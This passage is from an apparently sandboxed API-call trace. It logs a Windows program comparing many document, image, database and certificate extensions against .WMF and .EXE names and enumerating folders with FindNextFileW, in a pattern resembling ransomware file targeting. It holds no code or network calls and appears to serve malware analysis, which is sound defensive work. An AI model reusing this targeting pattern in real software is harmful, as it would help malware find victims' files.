returned -1 [0039.290] lstrlenW (lpString=".pem") returned 4 [0039.290] lstrcmpiW (lpString1=".pem", lpString2=".WMF") returned -1 [0039.290] lstrlenW (lpString=".pff") returned 4 [0039.290] lstrcmpiW (lpString1=".pff", lpString2=".WMF") returned -1 [0039.290] lstrlenW (lpString=".pfm") returned 4 [0039.290] lstrcmpiW (lpString1=".pfm", lpString2=".WMF") returned -1 [0039.290] lstrlenW (lpString=".pfx") returned 4 [0039.290] lstrcmpiW (lpString1=".pfx", lpString2=".WMF") returned -1 [0039.290] lstrlenW (lpString=".pgm") returned 4 [0039.290] lstrcmpiW (lpString1=".pgm", lpString2=".WMF") returned -1 [0039.291] lstrlenW (lpString=".php") returned 4 [0039.291] lstrcmpiW (lpString1=".php", lpString2=".WMF") returned -1 [0039.291] lstrlenW (lpString=".php3") returned 5 [0039.291] lstrcmpiW (lpString1=".php3", lpString2="_.WMF") returned -1 [0039.291] lstrlenW (lpString=".php4") returned 5 [0039.291] lstrcmpiW (lpString1=".php4", lpString2="_.WMF") returned -1 [0039.291] lstrlenW (lpString=".php5") returned 5 [0039.291] lstrcmpiW (lpString1=".php5", lpString2="_.WMF") returned -1 [0039.291] lstrlenW (lpString=".phtml") returned 6 [0039.291] lstrcmpiW (lpString1=".phtml", lpString2="7_.WMF") returned -1 [0039.291] lstrlenW (lpString=".pict") returned 5 [0039.291] lstrcmpiW (lpString1=".pict", lpString2="_.WMF") returned -1 [0039.291] lstrlenW (lpString=".pl") returned 3 [0039.291] lstrcmpiW (lpString1=".pl", lpString2="WMF") returned -1 [0039.291] lstrlenW (lpString=".pls") returned 4 [0039.291] lstrcmpiW (lpString1=".pls", lpString2=".WMF") returned -1 [0039.291] lstrlenW (lpString=".pm") returned 3 [0039.291] lstrcmpiW (lpString1=".pm", lpString2="WMF") returned -1 [0039.291] lstrlenW (lpString=".png") returned 4 [0039.291] lstrcmpiW (lpString1=".png", lpString2=".WMF") returned -1 [0039.291] lstrlenW (lpString=".pnm") returned 4 [0039.291] lstrcmpiW (lpString1=".pnm", lpString2=".WMF") returned -1 [0039.291] lstrlenW (lpString=".pot") returned 4 [0039.291] lstrcmpiW (lpString1=".pot", lpString2=".WMF") returned -1 [0039.291] lstrlenW (lpString=".potm") returned 5 [0039.291] lstrcmpiW (lpString1=".potm", lpString2="_.WMF") returned -1 [0039.291] lstrlenW (lpString=".potx") returned 5 [0039.291] lstrcmpiW (lpString1=".potx", lpString2="_.WMF") returned -1 [0039.291] lstrlenW (lpString=".ppa") returned 4 [0039.291] lstrcmpiW (lpString1=".ppa", lpString2=".WMF") returned -1 [0039.291] lstrlenW (lpString=".ppam") returned 5 [0039.291] lstrcmpiW (lpString1=".ppam", lpString2="_.WMF") returned -1 [0039.291] lstrlenW (lpString=".ppm") returned 4 [0039.291] lstrcmpiW (lpString1=".ppm", lpString2=".WMF") returned -1 [0039.291] lstrlenW (lpString=".pps") returned 4 [0039.291] lstrcmpiW (lpString1=".pps", lpString2=".WMF") returned -1 [0039.291] lstrlenW (lpString=".ppsm") returned 5 [0039.291] lstrcmpiW (lpString1=".ppsm", lpString2="_.WMF") returned -1 [0039.292] lstrlenW (lpString=".ppt") returned 4 [0039.292] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0039.292] lstrlenW (lpString=".pptm") returned 5 [0039.292] lstrcmpiW (lpString1=".pptm", lpString2="_.WMF") returned -1 [0039.292] lstrlenW (lpString=".pptx") returned 5 [0039.292] lstrcmpiW (lpString1=".pptx", lpString2="_.WMF") returned -1 [0039.292] lstrlenW (lpString=".prn") returned 4 [0039.292] lstrcmpiW (lpString1=".prn", lpString2=".WMF") returned -1 [0039.292] lstrlenW (lpString=".ps") returned 3 [0039.292] lstrcmpiW (lpString1=".ps", lpString2="WMF") returned -1 [0039.292] lstrlenW (lpString=".psb") returned 4 [0039.292] lstrcmpiW (lpString1=".psb", lpString2=".WMF") returned -1 [0039.292] lstrlenW (lpString=".psd") returned 4 [0039.292] lstrcmpiW (lpString1=".psd", lpString2=".WMF") returned -1 [0039.292] lstrlenW (lpString=".pst") returned 4 [0039.292] lstrcmpiW (lpString1=".pst", lpString2=".WMF") returned -1 [0039.292] lstrlenW (lpString=".ptx") returned 4 [0039.292] lstrcmpiW (lpString1=".ptx", lpString2=".WMF") returned -1 [0039.292] lstrlenW (lpString=".pub") returned 4 [0039.292] lstrcmpiW (lpString1=".pub", lpString2=".WMF") returned -1 [0039.292] lstrlenW (lpString=".pwm") returned 4 [0039.292] lstrcmpiW (lpString1=".pwm", lpString2=".WMF") returned -1 [0039.292] lstrlenW (lpString=".pxr") returned 4 [0039.292] lstrcmpiW (lpString1=".pxr", lpString2=".WMF") returned -1 [0039.292] lstrlenW (lpString=".py") returned 3 [0039.292] lstrcmpiW (lpString1=".py", lpString2="WMF") returned -1 [0039.292] lstrlenW (lpString=".qt") returned 3 [0039.292] lstrcmpiW (lpString1=".qt", lpString2="WMF") returned -1 [0039.292] lstrlenW (lpString=".r3d") returned 4 [0039.292] lstrcmpiW (lpString1=".r3d", lpString2=".WMF") returned -1 [0039.292] lstrlenW (lpString=".raf") returned 4 [0039.292] lstrcmpiW (lpString1=".raf", lpString2=".WMF") returned -1 [0039.292] lstrlenW (lpString=".rar") returned 4 [0039.292] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0039.292] lstrlenW (lpString=".raw") returned 4 [0039.292] lstrcmpiW (lpString1=".raw", lpString2=".WMF") returned -1 [0040.694] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1 [0040.695] lstrcmpiW (lpString1=".3ds", lpString2=".EXE") returned -1 [0040.695] lstrcmpiW (lpString1=".3fr", lpString2=".EXE") returned -1 [0040.695] lstrcmpiW (lpString1=".3g2", lpString2=".EXE") returned -1 [0040.695] lstrcmpiW (lpString1=".3gp", lpString2=".EXE") returned -1 [0040.695] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1 [0040.695] lstrcmpiW (lpString1=".accda", lpString2="EV.EXE") returned -1 [0040.695] lstrcmpiW (lpString1=".accdb", lpString2="EV.EXE") returned -1 [0040.695] lstrcmpiW (lpString1=".accdc", lpString2="EV.EXE") returned -1 [0040.695] lstrcmpiW (lpString1=".accde", lpString2="EV.EXE") returned -1 [0040.695] lstrcmpiW (lpString1=".accdt", lpString2="EV.EXE") returned -1 [0040.695] lstrcmpiW (lpString1=".accdw", lpString2="EV.EXE") returned -1 [0040.695] lstrcmpiW (lpString1=".adb", lpString2=".EXE") returned -1 [0040.695] lstrcmpiW (lpString1=".adp", lpString2=".EXE") returned -1 [0040.695] lstrcmpiW (lpString1=".ai", lpString2="EXE") returned -1 [0040.695] lstrcmpiW (lpString1=".ai3", lpString2=".EXE") returned -1 [0040.695] lstrcmpiW (lpString1=".ai4", lpString2=".EXE") returned -1 [0040.695] lstrcmpiW (lpString1=".ai5", lpString2=".EXE") returned -1 [0040.695] lstrcmpiW (lpString1=".ai6", lpString2=".EXE") returned -1 [0040.695] lstrcmpiW (lpString1=".ai7", lpString2=".EXE") returned -1 [0040.695] lstrcmpiW (lpString1=".ai8", lpString2=".EXE") returned -1 [0040.695] lstrcmpiW (lpString1=".anim", lpString2="V.EXE") returned -1 [0040.696] lstrcmpiW (lpString1=".arw", lpString2=".EXE") returned -1 [0040.696] lstrcmpiW (lpString1=".as", lpString2="EXE") returned -1 [0040.696] lstrcmpiW (lpString1=".asa", lpString2=".EXE") returned -1 [0040.696] lstrcmpiW (lpString1=".asc", lpString2=".EXE") returned -1 [0040.696] lstrcmpiW (lpString1=".ascx", lpString2="V.EXE") returned -1 [0040.696] lstrcmpiW (lpString1=".asm", lpString2=".EXE") returned -1 [0040.696] lstrcmpiW (lpString1=".asmx", lpString2="V.EXE") returned -1 [0040.696] lstrcmpiW (lpString1=".asp", lpString2=".EXE") returned -1 [0040.696] lstrcmpiW (lpString1=".aspx", lpString2="V.EXE") returned -1 [0040.696] lstrcmpiW (lpString1=".asr", lpString2=".EXE") returned -1 [0040.696] lstrcmpiW (lpString1=".asx", lpString2=".EXE") returned -1 [0040.696] lstrcmpiW (lpString1=".avi", lpString2=".EXE") returned -1 [0040.696] lstrcmpiW (lpString1=".avs", lpString2=".EXE") returned -1 [0040.696] lstrcmpiW (lpString1=".backup", lpString2="LEV.EXE") returned -1 [0040.696] lstrcmpiW (lpString1=".bak", lpString2=".EXE") returned -1 [0040.696] lstrcmpiW (lpString1=".bay", lpString2=".EXE") returned -1 [0040.696] lstrcmpiW (lpString1=".bd", lpString2="EXE") returned -1 [0040.696] lstrcmpiW (lpString1=".bin", lpString2=".EXE") returned -1 [0040.696] lstrcmpiW (lpString1=".bmp", lpString2=".EXE") returned -1 [0040.696] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1 [0040.696] lstrcmpiW (lpString1=".c", lpString2="XE") returned -1 [0040.696] lstrcmpiW (lpString1=".cdr", lpString2=".EXE") returned -1 [0040.697] lstrcmpiW (lpString1=".cer", lpString2=".EXE") returned -1 [0040.697] lstrcmpiW (lpString1=".cf", lpString2="EXE") returned -1 [0040.697] lstrcmpiW (lpString1=".cfc", lpString2=".EXE") returned -1 [0040.697] lstrcmpiW (lpString1=".cfm", lpString2=".EXE") returned -1 [0040.697] lstrcmpiW (lpString1=".cfml", lpString2="V.EXE") returned -1 [0040.697] lstrcmpiW (lpString1=".cfu", lpString2=".EXE") returned -1 [0040.697] lstrcmpiW (lpString1=".chm", lpString2=".EXE") returned -1 [0040.697] lstrcmpiW (lpString1=".cin", lpString2=".EXE") returned -1 [0040.697] lstrcmpiW (lpString1=".class", lpString2="EV.EXE") returned -1 [0040.697] lstrcmpiW (lpString1=".clx", lpString2=".EXE") returned -1 [0040.697] lstrcmpiW (lpString1=".config", lpString2="LEV.EXE") returned -1 [0040.697] lstrcmpiW (lpString1=".cpp", lpString2=".EXE") returned -1 [0040.697] lstrcmpiW (lpString1=".cr2", lpString2=".EXE") returned -1 [0040.697] lstrcmpiW (lpString1=".crt", lpString2=".EXE") returned -1 [0040.697] lstrcmpiW (lpString1=".crw", lpString2=".EXE") returned -1 [0040.697] lstrcmpiW (lpString1=".cs", lpString2="EXE") returned -1 [0040.697] lstrcmpiW (lpString1=".css", lpString2=".EXE") returned -1 [0040.697] lstrcmpiW (lpString1=".csv", lpString2=".EXE") returned -1 [0040.697] lstrcmpiW (lpString1=".cub", lpString2=".EXE") returned -1 [0040.697] lstrcmpiW (lpString1=".dae", lpString2=".EXE") returned -1 [0040.697] lstrcmpiW (lpString1=".dat", lpString2=".EXE") returned -1 [0040.698] lstrcmpiW (lpString1=".db", lpString2="EXE") returned -1 [0040.698] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1 [0040.698] lstrcmpiW (lpString1=".dbx", lpString2=".EXE") returned -1 [0040.698] lstrcmpiW (lpString1=".dc3", lpString2=".EXE") returned -1 [0040.698] lstrcmpiW (lpString1=".dcm", lpString2=".EXE") returned -1 [0040.698] lstrcmpiW (lpString1=".dcr", lpString2=".EXE") returned -1 [0040.698] lstrcmpiW (lpString1=".der", lpString2=".EXE") returned -1 [0040.698] lstrcmpiW (lpString1=".dib", lpString2=".EXE") returned -1 [0040.698] lstrcmpiW (lpString1=".dic", lpString2=".EXE") returned -1 [0040.698] lstrcmpiW (lpString1=".dif", lpString2=".EXE") returned -1 [0040.698] lstrcmpiW (lpString1=".divx", lpString2="V.EXE") returned -1 [0040.698] lstrcmpiW (lpString1=".djvu", lpString2="V.EXE") returned -1 [0040.698] lstrcmpiW (lpString1=".dng", lpString2=".EXE") returned -1 [0040.698] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1 [0040.698] lstrcmpiW (lpString1=".docm", lpString2="V.EXE") returned -1 [0040.698] lstrcmpiW (lpString1=".docx", lpString2="V.EXE") returned -1 [0040.698] lstrcmpiW (lpString1=".dot", lpString2=".EXE") returned -1 [0040.698] lstrcmpiW (lpString1=".dotm", lpString2="V.EXE") returned -1 [0040.698] lstrcmpiW (lpString1=".dotx", lpString2="V.EXE") returned -1 [0040.698] lstrcmpiW (lpString1=".dpx", lpString2=".EXE") returned -1 [0040.698] lstrcmpiW (lpString1=".dqy", lpString2=".EXE") returned -1 [0040.699] lstrcmpiW (lpString1=".dsn", lpString2=".EXE") returned -1 [0040.699] lstrcmpiW (lpString1=".dt", lpString2="EXE") returned -1 [0040.699] lstrcmpiW (lpString1=".dtd", lpString2=".EXE") returned -1 [0040.699] lstrcmpiW (lpString1=".dwg", lpString2=".EXE") returned -1 [0040.699] lstrcmpiW (lpString1=".dwt", lpString2=".EXE") returned -1 [0040.699] lstrcmpiW (lpString1=".dx", lpString2="EXE") returned -1 [0040.699] lstrcmpiW (lpString1=".dxf", lpString2=".EXE") returned -1 [0040.699] lstrcmpiW (lpString1=".edml", lpString2="V.EXE") returned -1 [0040.699] lstrcmpiW (lpString1=".efd", lpString2=".EXE") returned -1 [0040.699] lstrcmpiW (lpString1=".elf", lpString2=".EXE") returned -1 [0040.699] lstrcmpiW (lpString1=".emf", lpString2=".EXE") returned -1 [0040.699] lstrcmpiW (lpString1=".emz", lpString2=".EXE") returned -1 [0040.699] lstrcmpiW (lpString1=".epf", lpString2=".EXE") returned -1 [0040.699] lstrcmpiW (lpString1=".eps", lpString2=".EXE") returned -1 [0040.699] lstrcmpiW (lpString1=".epsf", lpString2="V.EXE") returned -1 [0040.699] lstrcmpiW (lpString1=".epsp", lpString2="V.EXE") returned -1 [0040.699] lstrcmpiW (lpString1=".erf", lpString2=".EXE") returned -1 [0040.699] lstrcmpiW (lpString1=".exr", lpString2=".EXE") returned 1 [0040.699] lstrcmpiW (lpString1=".f4v", lpString2=".EXE") returned 1 [0040.699] lstrcmpiW (lpString1=".fido", lpString2="V.EXE") returned -1 [0040.699] lstrcmpiW (lpString1=".flm", lpString2=".EXE") returned 1 [0040.699] lstrcmpiW (lpString1=".flv", lpString2=".EXE") returned 1 [0040.700] lstrcmpiW (lpString1=".frm", lpString2=".EXE") returned 1 [0040.700] lstrcmpiW (lpString1=".fxg", lpString2=".EXE") returned 1 [0040.700] lstrcmpiW (lpString1=".geo", lpString2=".EXE") returned 1 [0040.700] lstrcmpiW (lpString1=".gif", lpString2=".EXE") returned 1 [0040.700] lstrcmpiW (lpString1=".grs", lpString2=".EXE") returned 1 [0040.700] lstrcmpiW (lpString1=".gz", lpString2="EXE") returned -1 [0040.700] lstrcmpiW (lpString1=".h", lpString2="XE") returned -1 [0040.700] lstrcmpiW (lpString1=".hdr", lpString2=".EXE") returned 1 [0040.700] lstrcmpiW (lpString1=".hpp", lpString2=".EXE") returned 1 [0040.700] lstrcmpiW (lpString1=".hta", lpString2=".EXE") returned 1 [0040.700] lstrcmpiW (lpString1=".htc", lpString2=".EXE") returned 1 [0040.700] lstrcmpiW (lpString1=".htm", lpString2=".EXE") returned 1 [0040.700] lstrcmpiW (lpString1=".html", lpString2="V.EXE") returned -1 [0040.700] lstrcmpiW (lpString1=".icb", lpString2=".EXE") returned 1 [0040.700] lstrcmpiW (lpString1=".ics", lpString2=".EXE") returned 1 [0040.700] lstrcmpiW (lpString1=".iff", lpString2=".EXE") returned 1 [0040.700] lstrcmpiW (lpString1=".inc", lpString2=".EXE") returned 1 [0040.700] lstrcmpiW (lpString1=".indd", lpString2="V.EXE") returned -1 [0040.700] lstrcmpiW (lpString1=".ini", lpString2=".EXE") returned 1 [0040.700] lstrcmpiW (lpString1=".iqy", lpString2=".EXE") returned 1 [0040.700] lstrcmpiW (lpString1=".j2c", lpString2=".EXE") returned 1 [0040.701] lstrcmpiW (lpString1=".j2k", lpString2=".EXE") returned 1 [0040.701] lstrcmpiW (lpString1=".java", lpString2="V.EXE") returned -1 [0040.701] lstrcmpiW (lpString1=".jp2", lpString2=".EXE") returned 1 [0040.701] lstrcmpiW (lpString1=".jpc", lpString2=".EXE") returned 1 [0040.701] lstrcmpiW (lpString1=".jpe", lpString2=".EXE") returned 1 [0040.701] lstrcmpiW (lpString1=".jpeg", lpString2="V.EXE") returned -1 [0040.701] lstrcmpiW (lpString1=".jpf", lpString2=".EXE") returned 1 [0040.702] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1 [0040.702] lstrcmpiW (lpString1=".jpx", lpString2=".EXE") returned 1 [0040.702] lstrcmpiW (lpString1=".js", lpString2="EXE") returned -1 [0040.702] lstrcmpiW (lpString1=".jsf", lpString2=".EXE") returned 1 [0040.702] lstrcmpiW (lpString1=".json", lpString2="V.EXE") returned -1 [0040.702] lstrcmpiW (lpString1=".jsp", lpString2=".EXE") returned 1 [0040.702] lstrcmpiW (lpString1=".kdc", lpString2=".EXE") returned 1 [0040.702] lstrcmpiW (lpString1=".kmz", lpString2=".EXE") returned 1 [0040.702] lstrcmpiW (lpString1=".kwm", lpString2=".EXE") returned 1 [0040.702] lstrcmpiW (lpString1=".lasso", lpString2="EV.EXE") returned -1 [0040.702] lstrcmpiW (lpString1=".lbi", lpString2=".EXE") returned 1 [0040.702] lstrcmpiW (lpString1=".lgf", lpString2=".EXE") returned 1 [0040.702] lstrcmpiW (lpString1=".lgp", lpString2=".EXE") returned 1 [0040.702] lstrcmpiW (lpString1=".log", lpString2=".EXE") returned 1 [0040.702] lstrcmpiW (lpString1=".m1v", lpString2=".EXE") returned 1 [0040.702] lstrcmpiW (lpString1=".m4a", lpString2=".EXE") returned 1 [0040.702] lstrcmpiW (lpString1=".m4v", lpString2=".EXE") returned 1 [0040.702] lstrcmpiW (lpString1=".max", lpString2=".EXE") returned 1 [0040.702] lstrcmpiW (lpString1=".md", lpString2="EXE") returned -1 [0040.702] lstrcmpiW (lpString1=".mda", lpString2=".EXE") returned 1 [0040.703] lstrcmpiW (lpString1=".mdb", lpString2=".EXE") returned 1 [0040.703] lstrcmpiW (lpString1=".mde", lpString2=".EXE") returned 1 [0040.703] lstrcmpiW (lpString1=".mdf", lpString2=".EXE") returned 1 [0040.703] lstrcmpiW (lpString1=".mdw", lpString2=".EXE") returned 1 [0040.703] lstrcmpiW (lpString1=".mef", lpString2=".EXE") returned 1 [0040.703] lstrcmpiW (lpString1=".mft", lpString2=".EXE") returned 1 [0040.703] lstrcmpiW (lpString1=".mfw", lpString2=".EXE") returned 1 [0040.703] lstrcmpiW (lpString1=".mht", lpString2=".EXE") returned 1 [0040.703] lstrcmpiW (lpString1=".mhtml", lpString2="EV.EXE") returned -1 [0040.703] lstrcmpiW (lpString1=".mka", lpString2=".EXE") returned 1 [0040.703] lstrcmpiW (lpString1=".mkidx", lpString2="EV.EXE") returned -1 [0040.703] lstrcmpiW (lpString1=".mkv", lpString2=".EXE") returned 1 [0040.703] lstrcmpiW (lpString1=".mos", lpString2=".EXE") returned 1 [0040.703] lstrcmpiW (lpString1=".mov", lpString2=".EXE") returned 1 [0040.703] lstrcmpiW (lpString1=".mp3", lpString2=".EXE") returned 1 [0040.703] lstrcmpiW (lpString1=".mp4", lpString2=".EXE") returned 1 [0040.703] lstrcmpiW (lpString1=".mpeg", lpString2="V.EXE") returned -1 [0040.703] lstrcmpiW (lpString1=".mpg", lpString2=".EXE") returned 1 [0040.703] lstrcmpiW (lpString1=".mpv", lpString2=".EXE") returned 1 [0040.703] lstrcmpiW (lpString1=".mrw", lpString2=".EXE") returned 1 [0040.703] lstrcmpiW (lpString1=".msg", lpString2=".EXE") returned 1 [0040.703] lstrcmpiW (lpString1=".mxl", lpString2=".EXE") returned 1 [0040.704] lstrcmpiW (lpString1=".myd", lpString2=".EXE") returned 1 [0040.704] lstrcmpiW (lpString1=".myi", lpString2=".EXE") returned 1 [0040.704] lstrcmpiW (lpString1=".nef", lpString2=".EXE") returned 1 [0040.704] lstrcmpiW (lpString1=".nrw", lpString2=".EXE") returned 1 [0040.704] lstrcmpiW (lpString1=".obj", lpString2=".EXE") returned 1 [0040.704] lstrcmpiW (lpString1=".odb", lpString2=".EXE") returned 1 [0040.704] lstrcmpiW (lpString1=".odc", lpString2=".EXE") returned 1 [0040.704] lstrcmpiW (lpString1=".odm", lpString2=".EXE") returned 1 [0040.704] lstrcmpiW (lpString1=".odp", lpString2=".EXE") returned 1 [0040.704] lstrcmpiW (lpString1=".ods", lpString2=".EXE") returned 1 [0040.704] lstrcmpiW (lpString1=".oft", lpString2=".EXE") returned 1 [0040.704] lstrcmpiW (lpString1=".one", lpString2=".EXE") returned 1 [0040.704] lstrcmpiW (lpString1=".onepkg", lpString2="LEV.EXE") returned -1 [0040.704] lstrcmpiW (lpString1=".onetoc2", lpString2="ELEV.EXE") returned -1 [0040.704] lstrcmpiW (lpString1=".opt", lpString2=".EXE") returned 1 [0040.704] lstrcmpiW (lpString1=".oqy", lpString2=".EXE") returned 1 [0040.704] lstrcmpiW (lpString1=".orf", lpString2=".EXE") returned 1 [0040.704] lstrcmpiW (lpString1=".p12", lpString2=".EXE") returned 1 [0040.704] lstrcmpiW (lpString1=".p7b", lpString2=".EXE") returned 1 [0040.704] lstrcmpiW (lpString1=".p7c", lpString2=".EXE") returned 1 [0040.704] lstrcmpiW (lpString1=".pam", lpString2=".EXE") returned 1 [0040.705] lstrcmpiW (lpString1=".pbm", lpString2=".EXE") returned 1 [0040.705] lstrcmpiW (lpString1=".pct", lpString2=".EXE") returned 1 [0040.705] lstrcmpiW (lpString1=".pcx", lpString2=".EXE") returned 1 [0040.705] lstrcmpiW (lpString1=".pdd", lpString2=".EXE") returned 1 [0040.705] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1 [0040.705] lstrcmpiW (lpString1=".pdp", lpString2=".EXE") returned 1 [0040.705] lstrcmpiW (lpString1=".pef", lpString2=".EXE") returned 1 [0040.705] lstrcmpiW (lpString1=".pem", lpString2=".EXE") returned 1 [0040.705] lstrcmpiW (lpString1=".pff", lpString2=".EXE") returned 1 [0040.705] lstrcmpiW (lpString1=".pfm", lpString2=".EXE") returned 1 [0040.705] lstrcmpiW (lpString1=".pfx", lpString2=".EXE") returned 1 [0040.705] lstrcmpiW (lpString1=".pgm", lpString2=".EXE") returned 1 [0040.705] lstrcmpiW (lpString1=".php", lpString2=".EXE") returned 1 [0040.705] lstrcmpiW (lpString1=".php3", lpString2="V.EXE") returned -1 [0040.705] lstrcmpiW (lpString1=".php4", lpString2="V.EXE") returned -1 [0040.705] lstrcmpiW (lpString1=".php5", lpString2="V.EXE") returned -1 [0040.705] lstrcmpiW (lpString1=".phtml", lpString2="EV.EXE") returned -1 [0040.705] lstrcmpiW (lpString1=".pict", lpString2="V.EXE") returned -1 [0040.705] lstrcmpiW (lpString1=".pl", lpString2="EXE") returned -1 [0040.705] lstrcmpiW (lpString1=".pls", lpString2=".EXE") returned 1 [0040.705] lstrcmpiW (lpString1=".pm", lpString2="EXE") returned -1 [0040.705] lstrcmpiW (lpString1=".png", lpString2=".EXE") returned 1 [0040.706] lstrcmpiW (lpString1=".pnm", lpString2=".EXE") returned 1 [0040.706] lstrcmpiW (lpString1=".pot", lpString2=".EXE") returned 1 [0040.706] lstrcmpiW (lpString1=".potm", lpString2="V.EXE") returned -1 [0040.706] lstrcmpiW (lpString1=".potx", lpString2="V.EXE") returned -1 [0040.706] lstrcmpiW (lpString1=".ppa", lpString2=".EXE") returned 1 [0040.706] lstrcmpiW (lpString1=".ppam", lpString2="V.EXE") returned -1 [0040.706] lstrcmpiW (lpString1=".ppm", lpString2=".EXE") returned 1 [0040.706] lstrcmpiW (lpString1=".pps", lpString2=".EXE") returned 1 [0040.706] lstrcmpiW (lpString1=".ppsm", lpString2="V.EXE") returned -1 [0040.706] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1 [0040.706] lstrcmpiW (lpString1=".pptm", lpString2="V.EXE") returned -1 [0040.706] lstrcmpiW (lpString1=".pptx", lpString2="V.EXE") returned -1 [0040.706] lstrcmpiW (lpString1=".prn", lpString2=".EXE") returned 1 [0040.706] lstrcmpiW (lpString1=".ps", lpString2="EXE") returned -1 [0040.706] lstrcmpiW (lpString1=".psb", lpString2=".EXE") returned 1 [0040.706] lstrcmpiW (lpString1=".psd", lpString2=".EXE") returned 1 [0040.706] lstrcmpiW (lpString1=".pst", lpString2=".EXE") returned 1 [0040.706] lstrcmpiW (lpString1=".ptx", lpString2=".EXE") returned 1 [0040.706] lstrcmpiW (lpString1=".pub", lpString2=".EXE") returned 1 [0040.706] lstrcmpiW (lpString1=".pwm", lpString2=".EXE") returned 1 [0040.706] lstrcmpiW (lpString1=".pxr", lpString2=".EXE") returned 1 [0040.707] lstrcmpiW (lpString1=".py", lpString2="EXE") returned -1 [0040.707] lstrcmpiW (lpString1=".qt", lpString2="EXE") returned -1 [0040.707] lstrcmpiW (lpString1=".r3d", lpString2=".EXE") returned 1 [0040.707] lstrcmpiW (lpString1=".raf", lpString2=".EXE") returned 1 [0040.707] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1 [0040.707] lstrcmpiW (lpString1=".raw", lpString2=".EXE") returned 1 [0040.707] lstrcmpiW (lpString1=".rdf", lpString2=".EXE") returned 1 [0040.707] FindNextFileW (in: hFindFile=0x6c4068, lpFindFileData=0x2f2f310 | out: lpFindFileData=0x2f2f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c7bd300, ftCreationTime.dwHighDateTime=0x1ca8073, ftLastAccessTime.dwLowDateTime=0xc7ce790, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8c7bd300, ftLastWriteTime.dwHighDateTime=0x1ca8073, nFileSizeHigh=0x0, nFileSizeLow=0x1ab7d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ONENOTE.HXS", cAlternateFileName="")) returned 1 [0042.483] FindNextFileW (in: hFindFile=0x6c4268, lpFindFileData=0x2f2e920 | out: lpFindFileData=0x2f2e920*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5127f1f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.484] FindNextFileW (in: hFindFile=0x6c4268, lpFindFileData=0x2f2e920 | out: lpFindFileData=0x2f2e920*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9caf4500, ftCreationTime.dwHighDateTime=0x1c747ea, ftLastAccessTime.dwLowDateTime=0x5127f1f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9caf4500, ftLastWriteTime.dwHighDateTime=0x1c747ea, nFileSizeHigh=0x0, nFileSizeLow=0x75f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe.css", cAlternateFileName="")) returned 1 [0042.485] FindNextFileW (in: hFindFile=0x6c4268, lpFindFileData=0x2f2e920 | out: lpFindFileData=0x2f2e920*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5133d8d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5eb8e810, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Americana", cAlternateFileName="AMERIC~1")) returned 1 [0042.487] FindNextFileW (in: hFindFile=0x6c42a8, lpFindFileData=0x2f2e6a4 | out: lpFindFileData=0x2f2e6a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5133d8d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5eb8e810, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.487] FindNextFileW (in: hFindFile=0x6c42a8, lpFindFileData=0x2f2e6a4 | out: lpFindFileData=0x2f2e6a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9caf4500, ftCreationTime.dwHighDateTime=0x1c747ea, ftLastAccessTime.dwLowDateTime=0x5133d8d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9caf4500, ftLastWriteTime.dwHighDateTime=0x1c747ea, nFileSizeHigh=0x0, nFileSizeLow=0x155, dwReserved0=0x0, dwReserved1=0x0, cFileName="TAB_OFF.GIF", cAlternateFileName="")) returned 1 [0042.494] FindNextFileW (in: hFindFile=0x6c42e8, lpFindFileData=0x2f2e6a4 | out: lpFindFileData=0x2f2e6a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa173f900, ftCreationTime.dwHighDateTime=0x1c747ea, ftLastAccessTime.dwLowDateTime=0x5a9f29b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa173f900, ftLastWriteTime.dwHighDateTime=0x1c747ea, nFileSizeHigh=0x0, nFileSizeLow=0x16c, dwReserved0=0x0, dwReserved1=0x0, cFileName="TAB_ON.GIF", cAlternateFileName="")) returned 0 [0042.495] FindClose (in: hFindFile=0x6c42e8 | out: hFindFile=0x6c42e8) returned 1 [0042.495] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x40070e0 | out: hHeap=0x5d0000) returned 1 [0042.495] FindNextFileW (in: 